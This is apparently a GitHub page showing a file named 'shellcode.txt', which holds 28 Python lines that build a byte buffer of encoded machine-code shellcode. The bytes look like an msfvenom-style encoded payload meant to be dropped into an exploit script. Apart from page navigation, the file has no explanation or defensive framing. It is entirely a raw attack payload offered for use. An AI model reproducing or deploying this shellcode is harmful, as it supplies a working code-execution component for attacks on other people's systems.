-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathshellcode.txt
More file actions
28 lines (28 loc) · 1.58 KB
/
shellcode.txt
File metadata and controls
28 lines (28 loc) · 1.58 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
buf += b"\xbd\xa9\x52\xa3\x17\xd9\xce\xd9\x74\x24\xf4\x5a"
buf += b"\x31\xc9\xb1\x4c\x31\x6a\x13\x83\xc2\x04\x03\x6a"
buf += b"\xa6\xb0\x56\xad\x86\x76\x86\xf8\x2c\xab\x61\x88"
buf += b"\xf4\xa0\xc9\x42\x3d\xf9\xab\x95\xee\xee\x30\x85"
buf += b"\x04\x8c\xf4\x2d\xf8\x25\x5a\x43\xa8\x1b\xc6\x29"
buf += b"\xdf\xe3\xed\x3f\x6c\x35\xf1\x67\x58\xdd\xc3\x25"
buf += b"\x65\x88\x2f\x03\xd7\x56\x2d\x38\x22\xd7\x15\x03"
buf += b"\x74\xfd\x3f\x74\xd5\x0d\x0a\xeb\x21\x45\xe7\x4c"
buf += b"\x32\x4d\x82\xd9\x29\x7f\x74\xb6\x1d\x0b\x11\xcb"
buf += b"\x79\x77\xd8\x8a\x19\x38\x5f\xc5\x47\xd3\xf8\xe7"
buf += b"\x22\xfa\x53\x8f\xc6\xcd\x3c\x7f\x5d\x19\x08\x93"
buf += b"\x97\xf3\xd3\x60\xce\xc3\x56\x9e\x0e\x9a\xfb\xb5"
buf += b"\x84\x32\x12\x96\x4c\x18\xf7\x16\x21\xff\xba\xfb"
buf += b"\x02\x2a\x08\xff\xf5\xd3\x94\xc7\x00\xf2\x8d\x35"
buf += b"\xd5\x3b\x28\x9a\x5f\xa5\xc8\x18\xbb\x23\xb7\x3c"
buf += b"\x87\x8b\x9a\xfb\x27\x0f\x5d\xdd\xf1\x61\x84\x6d"
buf += b"\x3d\xa5\x10\x4e\x72\xa0\x39\x35\x93\x37\x0a\xa6"
buf += b"\xd2\xff\x43\x79\x76\x92\x7c\x14\x46\xd3\x8e\x98"
buf += b"\x98\xd0\x1f\x74\x09\xe6\x57\xdf\x4e\x0f\x68\xdd"
buf += b"\x75\x84\x93\x1d\xd5\x8c\x6c\xeb\x77\xc9\x57\x23"
buf += b"\x8a\xa9\x7a\x26\xb7\xbe\x58\x8b\x41\x23\x28\x89"
buf += b"\x5c\x3b\x9b\xff\xc6\xed\xfc\x29\x23\x55\x4a\x00"
buf += b"\xf6\xa2\x13\x57\x5f\x8e\xf6\x85\x5d\x38\x5d\xb5"
buf += b"\xa4\x29\x36\x33\xfb\xb5\x54\xd6\xc9\xa8\x58\xf9"
buf += b"\x86\x89\x46\x40\x19\x43\x18\xb6\x93\x1a\xd9\xc6"
buf += b"\x6b\xbc\xfb\xd9\xc2\x64\x05\xee\x36\x3a\x50\x88"
buf += b"\x26\x0d\x0c\xed\x7f\x35\x1b\xf5\xf3\xfe\xca\xec"
buf += b"\xe0\x90\x46\xf3"